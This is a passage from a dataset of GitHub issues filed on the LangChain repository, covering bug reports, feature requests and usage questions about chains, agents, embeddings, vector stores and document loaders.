Dataset columns (name, type, length/value range):

- issue_owner_repo: list, length 2–2
- issue_body: string, length 0–261k
- issue_title: string, length 1–925
- issue_comments_url: string, length 56–81
- issue_comments_count: int64, 0–2.5k
- issue_created_at: string, length 20–20
- issue_updated_at: string, length 20–20
- issue_html_url: string, length 37–62
- issue_github_id: int64, 387k–2.46B
- issue_number: int64, 1–127k
[ "langchain-ai", "langchain" ]
Since Pandas and Spark cannot match the speed of Polars, could you please create a Polars DataFrame Agent? It is 15x faster than Pandas.
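A Polars agent did not exist at the time of this request. As a rough, dependency-free illustration of what its core tool would do (mirroring the pandas DataFrame agent, which evaluates model-generated expressions against a `df` variable), here is a sketch in which a plain dict stands in for a Polars DataFrame; the function name and structure are hypothetical:

```python
def run_dataframe_query(df, code: str):
    # Evaluate a model-generated expression with the dataframe in scope,
    # which is essentially what the pandas dataframe agent's Python tool does.
    # A real Polars agent would expose a polars.DataFrame here instead.
    return eval(code, {"df": df})

# A plain dict stands in for a Polars DataFrame to keep the sketch dependency-free.
df = {"sales": [10, 20, 30]}
print(run_dataframe_query(df, "sum(df['sales'])"))  # → 60
```

In a real agent this tool would be wrapped with strict sandboxing, since `eval` on model output is dangerous without it.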
Polars Dataframe Agent Needed
https://api.github.com/repos/langchain-ai/langchain/issues/4620/comments
3
2023-05-13T08:46:09Z
2024-03-08T12:38:36Z
https://github.com/langchain-ai/langchain/issues/4620
1,708,521,121
4,620
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.167 python=3.10.10 system: Windows ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction `# !pip install langchain==0.0.167 from langchain import OpenAI, SQLDatabase, SQLDatabaseChain db = SQLDatabase.from_uri("mysql+pymysql://user:pass@some_mysql_db_address/db_name") llm = OpenAI(temperature=0, verbose=True) db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True) db_chain.run("How many employees are there?") ` ### Expected behavior Should not throw AttributeError: type object 'SQLDatabaseChain' has no attribute 'from_llm'
SQLDatabaseChain has no attribute from_llm
https://api.github.com/repos/langchain-ai/langchain/issues/4618/comments
6
2023-05-13T07:40:59Z
2024-03-26T09:21:00Z
https://github.com/langchain-ai/langchain/issues/4618
1,708,504,243
4,618
[ "langchain-ai", "langchain" ]
### Feature request It would be great if LangChain could support more Hugging Face embedding models. Prompt techniques don't work very well with the currently available sentence-transformer models. Open-source-powered technology could benefit from the adoption of updated models like Cerebras-GPT and Dolly. ### Motivation While creating a QA model with Hugging Face embeddings and models, I found that its performance could be improved with newer models like Cerebras-GPT and Dolly. ### Your contribution Yes, if someone guides me.
Support for new Hugging Face models like Cerebras-GPT, Dolly and others.
https://api.github.com/repos/langchain-ai/langchain/issues/4617/comments
3
2023-05-13T06:48:25Z
2023-09-15T16:13:37Z
https://github.com/langchain-ai/langchain/issues/4617
1,708,471,497
4,617
[ "langchain-ai", "langchain" ]
Hello 👋 I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@r3pwnx) has found a potential issue, which I would be eager to share with you. Could you add a `SECURITY.md` file with an e-mail address for me to send further details to? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future. Looking forward to hearing from you 👍 (cc @huntr-helper)
Add a security policy
https://api.github.com/repos/langchain-ai/langchain/issues/4614/comments
1
2023-05-13T04:20:13Z
2023-09-10T16:18:36Z
https://github.com/langchain-ai/langchain/issues/4614
1,708,426,607
4,614
[ "langchain-ai", "langchain" ]
### System Info def _split_list_of_docs( docs: List[Document], length_func: Callable, token_max: int, **kwargs: Any ) -> List[List[Document]]: new_result_doc_list = [] _sub_result_docs = [] for doc in docs: _sub_result_docs.append(doc) _num_tokens = length_func(_sub_result_docs, **kwargs) if _num_tokens > token_max: if len(_sub_result_docs) == 1: raise ValueError( "A single document was longer than the context length," " we cannot handle this." ) if len(_sub_result_docs) == 2: raise ValueError( "A single document was so long it could not be combined " "with another document, we cannot handle this." ) new_result_doc_list.append(_sub_result_docs[:-1]) _sub_result_docs = _sub_result_docs[-1:] new_result_doc_list.append(_sub_result_docs) return new_result_doc_list I encountered an issue with the following error message: "A single document was so long it could not be combined with another document, we cannot handle this." I suspect this could be a bug. The error might occur when the combined length of the summaries of two docs exceed the token_max limit. In this case, I believe that the two docs should be summarized separately and then merged. Could you provide a callback function allowing users to handle the logic of the _split_list_of_docs function by themselves? ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://github.com/hwchase17/langchain/blob/01531cb16d09b9290fc091434b0c69cb91a8f500/langchain/chains/combine_documents/map_reduce.py#L22 ### Expected behavior I believe that the two docs should be summarized separately and then merged. 
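For reference, a self-contained mini version of the function (plain strings as documents, a summed `len` as the length function) reproduces the reported error path when two documents together exceed `token_max`; this is a simplified sketch, not the library code itself:

```python
from typing import Callable, List

def split_list_of_docs(docs: List[str], length_func: Callable, token_max: int) -> List[List[str]]:
    # Greedy packing: accumulate docs until the running length exceeds token_max,
    # then start a new sublist with the doc that overflowed.
    new_result_doc_list = []
    _sub_result_docs = []
    for doc in docs:
        _sub_result_docs.append(doc)
        if length_func(_sub_result_docs) > token_max:
            if len(_sub_result_docs) == 1:
                raise ValueError("A single document was longer than the context length.")
            if len(_sub_result_docs) == 2:
                # This is the branch the issue reports: two summaries that together
                # exceed token_max are rejected instead of being re-summarized and merged.
                raise ValueError(
                    "A single document was so long it could not be combined with another document."
                )
            new_result_doc_list.append(_sub_result_docs[:-1])
            _sub_result_docs = _sub_result_docs[-1:]
    new_result_doc_list.append(_sub_result_docs)
    return new_result_doc_list

total_len = lambda docs: sum(len(d) for d in docs)
```

With `token_max=4`, `["aa", "bb", "cc"]` splits cleanly, while `["aaa", "bbb"]` hits the two-document `ValueError` described above.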
map_reduce._split_list_of_docs has bugs
https://api.github.com/repos/langchain-ai/langchain/issues/4613/comments
7
2023-05-13T04:04:27Z
2023-10-12T16:09:49Z
https://github.com/langchain-ai/langchain/issues/4613
1,708,422,949
4,613
[ "langchain-ai", "langchain" ]
How do I add memory to RetrievalQA.from_chain_type? Or, how do I add a custom prompt to ConversationalRetrievalChain? For the past 2 weeks I've been trying to make a chatbot that can chat over documents (so not just semantic search/QA, but with memory) and also with a custom prompt. I've tried every combination of all the chains, and so far the closest I've gotten is ConversationalRetrievalChain, but without custom prompts, and RetrievalQA.from_chain_type, but without memory.
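Independent of which chain is used, the desired prompt combines a custom system message, the chat history from memory, and the retrieved context. A plain-Python sketch of that assembly (the template text and function name are illustrative, not a LangChain API):

```python
def build_prompt(system: str, history, context: str, question: str) -> str:
    # history is a list of (speaker, message) pairs, i.e. the memory buffer.
    turns = "\n".join(f"{who}: {msg}" for who, msg in history)
    return (
        f"{system}\n\n"
        f"Chat history:\n{turns}\n\n"
        f"Context:\n{context}\n\n"
        f"Question: {question}\nAnswer:"
    )
```

In LangChain itself, depending on the installed version, a custom prompt can reportedly be supplied to `ConversationalRetrievalChain.from_llm` via `combine_docs_chain_kwargs={"prompt": ...}`, and `RetrievalQA.from_chain_type` accepts `chain_type_kwargs={"prompt": ...}` plus a `memory=` argument; worth verifying against your version.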
How do I add memory to RetrievalQA.from_chain_type? Or, how do I add a custom prompt to ConversationalRetrievalChain?
https://api.github.com/repos/langchain-ai/langchain/issues/4608/comments
21
2023-05-13T02:41:24Z
2024-06-07T00:21:07Z
https://github.com/langchain-ai/langchain/issues/4608
1,708,402,102
4,608
[ "langchain-ai", "langchain" ]
https://github.com/hwchase17/langchain/blob/ed0d557ede8776921cc3c5ca1f3aef81d3d0c7b5/langchain/chat_models/google_palm.py#L65 Fix: `if author == "ai" or author == "1":` seems to do the trick. Happy to submit a patch if y'all agree! The [Google Palm Chat API](https://developers.generativeai.google/tutorials/chat_quickstart#conversation_history) returns a "1" for the AI response (and a "0" for the human).
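The proposed check can be factored into a small helper; the "0"/"1" mapping follows the PaLM docs linked above, and the function name is illustrative:

```python
def normalize_author(author: str) -> str:
    # The PaLM chat API returns "1" for the AI turn and "0" for the human turn,
    # while the calling code expects "ai" / "human"; accept both spellings.
    if author in ("ai", "1"):
        return "ai"
    if author in ("human", "0"):
        return "human"
    raise ValueError(f"Unexpected author value: {author!r}")
```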
GooglePalm `author` is returned as "1" but code is expecting "ai"
https://api.github.com/repos/langchain-ai/langchain/issues/4606/comments
3
2023-05-12T23:48:59Z
2023-09-15T16:13:43Z
https://github.com/langchain-ai/langchain/issues/4606
1,708,344,927
4,606
[ "langchain-ai", "langchain" ]
### System Info Langchain ver 0.0.167, MacBook Pro 2018, Mac OS Ventura. ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1.) Download a model. 2.) Download the tokens file. 3.) Run code. from langchain.llms.rwkv import RWKV # Test the model def generate_prompt(instruction, input=None): if input: return f"""Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request. # Instruction: {instruction} # Input: {input} # Response: """ else: return f"""Below is an instruction that describes a task. Write a response that appropriately completes the request. # Instruction: {instruction} # Response: """ model = RWKV(model="~/Downloads/Q8_0RWKV.bin", strategy="cpu 8bit", tokens_path="./rwkv.tokens") response = model(generate_prompt("Once upon a time, ")) ### Expected behavior I expect the sample to produce some text. What I get is an error. It appears that the rwkv library is not installed, but it is... Traceback (most recent call last): File "/Users/John/Documents/Projects/langchainstufff/rwkv.py", line 29, in <module> model = RWKV(model="~/Downloads/Q8_0RWKV.bin", strategy="cpu 8bit", tokens_path="./rwkv.tokens") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__ vectorstore: VectorStore, pydantic.error_wrappers.ValidationError: 1 validation error for RWKV __root__ -> __root__ Could not import rwkv python package. Please install it with `pip install rwkv`. (type=value_error)
RWKV
https://api.github.com/repos/langchain-ai/langchain/issues/4604/comments
4
2023-05-12T22:41:16Z
2023-10-09T16:07:52Z
https://github.com/langchain-ai/langchain/issues/4604
1,708,300,793
4,604
[ "langchain-ai", "langchain" ]
Hi, how can I remove the escape sequences used for coloring in LangChain output? I want to parse the output, and these escape sequences are really a problem. Thanks.
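The coloring comes from ANSI escape sequences, which a small stdlib regex can remove from captured output. This is a general-purpose sketch, not a LangChain API:

```python
import re

# Matches ANSI SGR color codes such as "\x1b[32;1m" and the reset "\x1b[0m".
ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;]*m")

def strip_ansi(text: str) -> str:
    return ANSI_ESCAPE.sub("", text)

print(strip_ansi("\x1b[32;1mSELECT COUNT(*) FROM employees\x1b[0m"))
# → SELECT COUNT(*) FROM employees
```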
How to remove all coloring escape sequences in SQL query and result output
https://api.github.com/repos/langchain-ai/langchain/issues/4600/comments
4
2023-05-12T20:38:36Z
2023-09-04T07:05:03Z
https://github.com/langchain-ai/langchain/issues/4600
1,708,182,875
4,600
[ "langchain-ai", "langchain" ]
### System Info ![image](https://github.com/hwchase17/langchain/assets/100080151/8ad820d3-000b-4bb7-8808-5e97dfa79c1c) ### Who can help? @vowelparrot @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![image](https://github.com/hwchase17/langchain/assets/100080151/691b9904-c874-4e6f-8d97-94090f47c9b4) ### Expected behavior ![image](https://github.com/hwchase17/langchain/assets/100080151/866a44f4-86c2-4073-b612-03fa01e2b2e8)
Even use "print", the chatgpt is still "hallucinating"??
https://api.github.com/repos/langchain-ai/langchain/issues/4599/comments
2
2023-05-12T20:31:16Z
2023-05-12T21:21:14Z
https://github.com/langchain-ai/langchain/issues/4599
1,708,173,986
4,599
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. When I try to perform a similarity_search on an opensearch index on AWS of size 50GB (approx 2 million documents with vectors for each), i sometimes get this error. It does not happen all the time. Usually the first time when I make a request the response is successful, subsequent calls immediately result in this error. Is this error, because langchain is doing a similarity search over lot of vectors and open search ran out of memory? - ``` embeddings = OpenAIEmbeddings() docsearch = OpenSearchVectorSearch(index_name="xxxxxxxx", embedding_function=embeddings, opensearch_url=opensearch_url) query = "Whats the xxxxxxx" docs = docsearch.similarity_search(query, k=1, search_type = "approximate_search", vector_field="sentence_embedding") ``` TransportError Traceback (most recent call last) Cell In[100], line 2 1 query = "Whats the warranty on labor and materials for the work performed by V.A.M.P. L.L.C." ----> 2 docs = docsearch.similarity_search(query, k=1, search_type = "approximate_search", vector_field="sentence_embedding") 3 docs File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/langchain/vectorstores/opensearch_vector_search.py:426](https://file+.vscode-resource.vscode-cdn.net/Users/AXG143/ananth/training/semantic-search-elasticsearch-openai-langchain/~/ananth/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/langchain/vectorstores/opensearch_vector_search.py:426), in OpenSearchVectorSearch.similarity_search(self, query, k, **kwargs) 423 else: 424 raise ValueError("Invalid `search_type` provided as an argument") --> 426 response = self.client.search(index=self.index_name, body=search_query) 427 hits = [hit["_source"] for hit in response["hits"]["hits"][:k]] 428 documents = [ 429 Document( 430 page_content=hit[text_field], (...) 
435 for hit in hits 436 ] File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/utils.py:178](https://file+.vscode-resource.vscode-cdn.net/training/semantic-search-elasticsearch-openai-langchain/~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/utils.py:178), in query_params.._wrapper.._wrapped(*args, **kwargs) 176 if p in kwargs: 177 params[p] = kwargs.pop(p) --> 178 return func(*args, params=params, headers=headers, **kwargs) File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/__init__.py:1551](https://file+.vscode-resource.vscode-cdn.net/training/semantic-search-elasticsearch-openai-langchain/~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/__init__.py:1551), in OpenSearch.search(self, body, index, params, headers) ... --> 301 raise HTTP_EXCEPTIONS.get(status_code, TransportError)( 302 status_code, error_message, additional_info 303 ) TransportError: TransportError(500, 'search_phase_execution_exception') ### Suggestion: Expected response - langchain Opensearch similarity_search should work consistently on multiple calls.
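Since the failure is intermittent (often memory or load pressure on the OpenSearch side), a client-side retry with exponential backoff is a common mitigation. A generic sketch, with the exception type and delays as placeholders; in the real setting `retry_on` would be opensearchpy's `TransportError` and `fn` a closure over `docsearch.similarity_search(...)`:

```python
import time

def call_with_retries(fn, attempts=3, base_delay=1.0, retry_on=(RuntimeError,)):
    # Retry a flaky call, doubling the delay after each failure.
    for attempt in range(attempts):
        try:
            return fn()
        except retry_on:
            if attempt == attempts - 1:
                raise
            time.sleep(base_delay * (2 ** attempt))
```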
langchain OpenSearchVectorSearch similarity_search error
https://api.github.com/repos/langchain-ai/langchain/issues/4597/comments
3
2023-05-12T19:53:04Z
2023-11-21T16:07:20Z
https://github.com/langchain-ai/langchain/issues/4597
1,708,132,505
4,597
[ "langchain-ai", "langchain" ]
### System Info Mac OSX10.16 python 3.9 langchain 0.0.166 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I am following the example for the SelfQueryRetriever (https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html), but I am using Chroma When I try to create the SelfQueryRetriever from llm_chain SelfQueryRetriever.from_llm( vectorstore=db_chroma, llm=llm, document_contents=document_content_info, metadata_field_info=metadata_field_info ) or I try to create the chain with load_query_constructor_chain( llm=llm, document_contents=document_content_info, attribute_info=metadata_field_info, allowed_comparators=ChromaTranslator.allowed_comparators, allowed_operators=ChromaTranslator.allowed_operators) I receive the same error: def get_parser( 126 allowed_comparators: Optional[Sequence[Comparator]] = None, 127 allowed_operators: Optional[Sequence[Operator]] = None, 128 ) -> Lark: --> 129 transformer = QueryTransformer( 130 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators 131 ) 132 return Lark(GRAMMAR, parser="lalr", transformer=transformer, start="program") TypeError: 'NoneType' object is not callable I tried to create a QueryTransformer as follow: QueryTransformer(allowed_comparators=ChromaTranslator.allowed_comparators, allowed_operators=ChromaTranslator.allowed_operators) Same error. ### Expected behavior I would expect to create the selfQueryRetriever to be able to retrieve the documents from the retriever.
Problem with SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4587/comments
5
2023-05-12T16:54:43Z
2023-05-12T17:32:26Z
https://github.com/langchain-ai/langchain/issues/4587
1,707,934,037
4,587
[ "langchain-ai", "langchain" ]
### System Info 0.0.166 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [X] Async ### Reproduction from langchain.prompts import PromptTemplate from langchain.chains import LLMChain from langchain.chat_models import ChatOpenAI from langchain.callbacks import get_openai_callback ```python question = "What is the answer of the meaning of life?" prompt = PromptTemplate( input_variables=["input"], template="{input}", ) llm = ChatOpenAI(temperature=0.7, max_tokens=2000, streaming=True) chain = LLMChain(llm=llm, prompt=prompt) with get_openai_callback() as cb: print(chain.run(question)) print("\n\n") print(cb) ``` result ``` As an AI language model, I do not have a personal belief system or opinion, and therefore, I do not have an answer to this question. The meaning of life is a philosophical and subjective topic that varies from person to person. It is up to individuals to find their own purpose and meaning in life. Tokens Used: 0 Prompt Tokens: 0 Completion Tokens: 0 Successful Requests: 1 Total Cost (USD): $0.0 ``` when set streaming = False, it works. ### Expected behavior should return with token usage info with streaming = True or False
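Until usage reporting works with streaming, one workaround is to count completion tokens yourself in a streaming callback. A minimal dependency-free sketch that treats each streamed chunk as one token (a rough approximation of how OpenAI streams); in LangChain this would subclass `BaseCallbackHandler` and be passed via `callbacks=[...]`:

```python
class StreamingTokenCounter:
    """Tallies completion tokens from a streaming callback, since usage info
    is not included in streamed API responses."""
    def __init__(self):
        self.completion_tokens = 0

    def on_llm_new_token(self, token: str, **kwargs) -> None:
        self.completion_tokens += 1

counter = StreamingTokenCounter()
for tok in ["The", " answer", " is", " 42"]:
    counter.on_llm_new_token(tok)
print(counter.completion_tokens)  # → 4
```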
get_openai_callback doesn't work with streaming = True
https://api.github.com/repos/langchain-ai/langchain/issues/4583/comments
12
2023-05-12T15:07:29Z
2024-07-30T10:15:36Z
https://github.com/langchain-ai/langchain/issues/4583
1,707,797,834
4,583
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. The PlanAndExecute agent raises errors when no question is asked (e.g. a greeting interaction). Is there any chat implementation where a simple LLM chat interaction is available among the available tools? Thank you in advance. ### Suggestion: _No response_
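One pragmatic workaround is to route trivial conversational turns straight to the LLM and reserve the planner for real tasks. A dependency-free sketch; the greeting list and the `run_agent`/`run_chat` callables are placeholders for the PlanAndExecute agent and a plain chat call:

```python
GREETINGS = {"hi", "hello", "hey", "good morning"}

def route(user_input: str, run_agent, run_chat):
    # Send plain greetings to a direct LLM chat call; everything else to the planner.
    if user_input.strip().lower().rstrip("!.?") in GREETINGS:
        return run_chat(user_input)
    return run_agent(user_input)
```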
Issue: PlanAndExecute agent fails in chat mode when a simple chat interaction is required.
https://api.github.com/repos/langchain-ai/langchain/issues/4582/comments
4
2023-05-12T14:25:16Z
2023-09-19T16:11:11Z
https://github.com/langchain-ai/langchain/issues/4582
1,707,730,929
4,582
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am having issues with the flow of a conversation and the chat memory. When deployed in a Flask app and queried via Netlify, the memory is not maintained. Any suggestions? ### Suggestion: _No response_
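In a serverless or multi-instance Flask setup each request may hit a fresh process, so in-process ConversationBufferMemory is lost between requests; persisting history in an external store keyed by session id is the usual fix. A sketch with a dict standing in for Redis or a database table (the class and method names are illustrative):

```python
class SessionMemoryStore:
    # A dict stands in for an external store (Redis, DynamoDB, a SQL table);
    # serverless instances cannot rely on in-process memory between requests.
    def __init__(self):
        self._store = {}

    def history(self, session_id: str):
        return self._store.setdefault(session_id, [])

    def append(self, session_id: str, role: str, text: str) -> None:
        self.history(session_id).append((role, text))
```

On each request, load the session's history, rebuild the chain's memory from it, and append the new turn before returning.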
Issue:Problems with serverless architecture and ConversationBufferMemory
https://api.github.com/repos/langchain-ai/langchain/issues/4581/comments
4
2023-05-12T13:41:33Z
2023-11-01T16:07:30Z
https://github.com/langchain-ai/langchain/issues/4581
1,707,660,358
4,581
[ "langchain-ai", "langchain" ]
### System Info Langchain version == 0.0.166 Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2 LLM = AzureOpenAI ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: 1. Set up azure openai embeddings by providing key, version etc.. 2. Load a document with a loader 3. Set up a text splitter so you get more then 2 documents 4. add them to chromadb with `.add_documents(List<Document>)` This is some example code: ```py pdf = PyPDFLoader(url) documents = pdf.load() text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0) texts = text_splitter.split_documents(documents) vectordb.add_documents(texts) vectordb.persist() ``` ### Expected behavior Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.` This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once. The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214 The input should be a 1 dimentional array and not multi.
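Until the embedding client supports a configurable batch size, a workaround is to submit the texts in batches of one. A generic sketch where `embed_fn` is a placeholder for the actual embedding call:

```python
def embed_in_batches(texts, embed_fn, batch_size=1):
    # The Azure deployment rejected multi-input requests, so send batch_size
    # inputs (here: one) per call and concatenate the resulting vectors.
    vectors = []
    for i in range(0, len(texts), batch_size):
        vectors.extend(embed_fn(texts[i:i + batch_size]))
    return vectors
```

Newer LangChain versions reportedly expose a `chunk_size` argument on `OpenAIEmbeddings` (e.g. `chunk_size=1`) serving the same purpose; worth checking against the installed version.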
AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1.
https://api.github.com/repos/langchain-ai/langchain/issues/4575/comments
28
2023-05-12T12:38:50Z
2024-02-28T03:59:37Z
https://github.com/langchain-ai/langchain/issues/4575
1,707,564,739
4,575
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. CHAT_CONVERSATIONAL_REACT_DESCRIPTION agent is able to use only 1 tool per turn. The same is not happening for CONVERSATIONAL_REACT_DESCRIPTION. Is that done on purpose? How can I fix the agent to allow more than 1 tool per turn? Thank you. ### Suggestion: _No response_
Issue: CHAT_CONVERSATIONAL_REACT_DESCRIPTION only uses 1 tool per turn
https://api.github.com/repos/langchain-ai/langchain/issues/4574/comments
4
2023-05-12T12:38:32Z
2023-12-25T16:10:39Z
https://github.com/langchain-ai/langchain/issues/4574
1,707,564,297
4,574
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi! I implemented a chatbot with gpt-4 and a docx file which is provided as context. If I ask questions according to this context, it is returning relevant answers, but if I want to ask a question which is out of this context, it responses 'Based on the provided context I cannot answer this question' or something like that. How can I implement it in such a way, where it uses the context for every question, but if it cant find relevant answer for it in the context provided, it should take a look in its own language model. My AgentExecutor instance looks like this: ``` def _create_chat_agent(self): self.llm = OpenAI(temperature=0, model_name="gpt-4", top_p=0.2, presence_penalty=0.4, frequency_penalty=0.2) # Data Ingestion word_loader = DirectoryLoader(DOCUMENTS_DIRECTORY, glob="*.docx") documents = [] documents.extend(word_loader.load()) # Chunk and Embeddings text_splitter = CharacterTextSplitter(chunk_size=768, chunk_overlap=200) documents = text_splitter.split_documents(documents) embeddings = OpenAIEmbeddings() vectorstore = FAISS.from_documents(documents, embeddings) # Initialise Langchain - QA chain qa = RetrievalQA.from_chain_type(llm=self.llm, chain_type="stuff", retriever=vectorstore.as_retriever()) tools = [ Tool( name="...", func=qa.run, description="..." ), ] system_msg = "You are a helpful assistant." agent = ConversationalChatAgent.from_llm_and_tools( llm=self.llm, tools=tools, system_message=system_msg ) self.chat_agent = AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, verbose=True, memory=ConversationBufferMemory(memory_key="chat_history", return_messages=True) ) ``` ### Suggestion: _No response_
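One common pattern is to detect the retrieval chain's refusal and fall back to a plain LLM call. A sketch with stub callables and illustrative refusal markers (in practice the markers would be tuned to the model's actual refusal phrasing, or the chain's prompt changed to emit a sentinel):

```python
REFUSAL_MARKERS = ("cannot answer", "based on the provided context", "i don't know")

def answer_with_fallback(question, run_qa, run_llm):
    # Try the retrieval chain first; if it refuses, ask the bare model instead.
    answer = run_qa(question)
    if any(marker in answer.lower() for marker in REFUSAL_MARKERS):
        return run_llm(question)
    return answer
```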
Issue: Not answering questions out of context using RetrievalQA Chain and ConversationalChatAgent
https://api.github.com/repos/langchain-ai/langchain/issues/4573/comments
24
2023-05-12T12:08:52Z
2024-08-08T03:46:58Z
https://github.com/langchain-ai/langchain/issues/4573
1,707,522,559
4,573
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I have a Chroma store that contains 3 to 4 PDFs, and I need to search the database for documents whose metadata matches the filter `{'source': 'PDFname'}`, so it doesn't return different docs containing similar data. The same works with `similarity_search()` without any problems: ``` chain = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0), docsearch.as_retriever(), memory=memory) print(chain({'question': query})) ``` But I don't understand how to use filters with ConversationalRetrievalChain. I have tried `docsearch.as_retriever(kwargs={'filter': {'source': 'pdfname'}})`, but it doesn't seem to work. I also saw something like ``` retriever = vector_store.as_retriever() retriever.search_kwargs = {'k':1} ``` but it doesn't seem to recognise `.search_kwargs`. Any help would be appreciated. ### Suggestion: _No response_
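At its core the requested behavior is metadata filtering before retrieval; a dependency-free sketch of that filter, with documents as plain dicts:

```python
def filter_by_source(docs, source):
    # Keep only documents whose metadata 'source' matches the requested PDF.
    return [d for d in docs if d.get("metadata", {}).get("source") == source]

docs = [
    {"text": "alpha", "metadata": {"source": "a.pdf"}},
    {"text": "beta", "metadata": {"source": "b.pdf"}},
]
```

In LangChain itself, depending on the version, the supported spelling is `docsearch.as_retriever(search_kwargs={'filter': {'source': 'a.pdf'}})` (the keyword is `search_kwargs`, not `kwargs`); worth verifying against the installed release.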
can't seem to add filters in ConversationalRetrievalChain
https://api.github.com/repos/langchain-ai/langchain/issues/4572/comments
6
2023-05-12T11:52:19Z
2023-07-17T07:58:48Z
https://github.com/langchain-ai/langchain/issues/4572
1,707,488,023
4,572
[ "langchain-ai", "langchain" ]
I tried incorporating the Confluence document loader in my code. It's throwing an error. Can anyone help me out? Attaching the screenshots and required information. Code : ``` from langchain.document_loaders import ConfluenceLoader loader = ConfluenceLoader( url="https://vs2001.atlassian.net/wiki/spaces/<space-key>/pages/<page-id>/<doc-name>", username="<user-name>", api_key="<api-key>" ) documents = loader.load(space_key="<space-key>") print(documents) ``` Here the username I use is the prefix of my email up to the @ symbol, and the api_key was generated in the Confluence settings. Screenshot of the error: <img width="1195" alt="Screenshot 2023-05-12 at 4 30 41 PM" src="https://github.com/hwchase17/langchain/assets/62723522/f1a83ce2-9632-418e-b272-954c7780696a"> Can anyone tell me what I am doing wrong here?
Confluence Document Loader not working
https://api.github.com/repos/langchain-ai/langchain/issues/4571/comments
3
2023-05-12T11:09:50Z
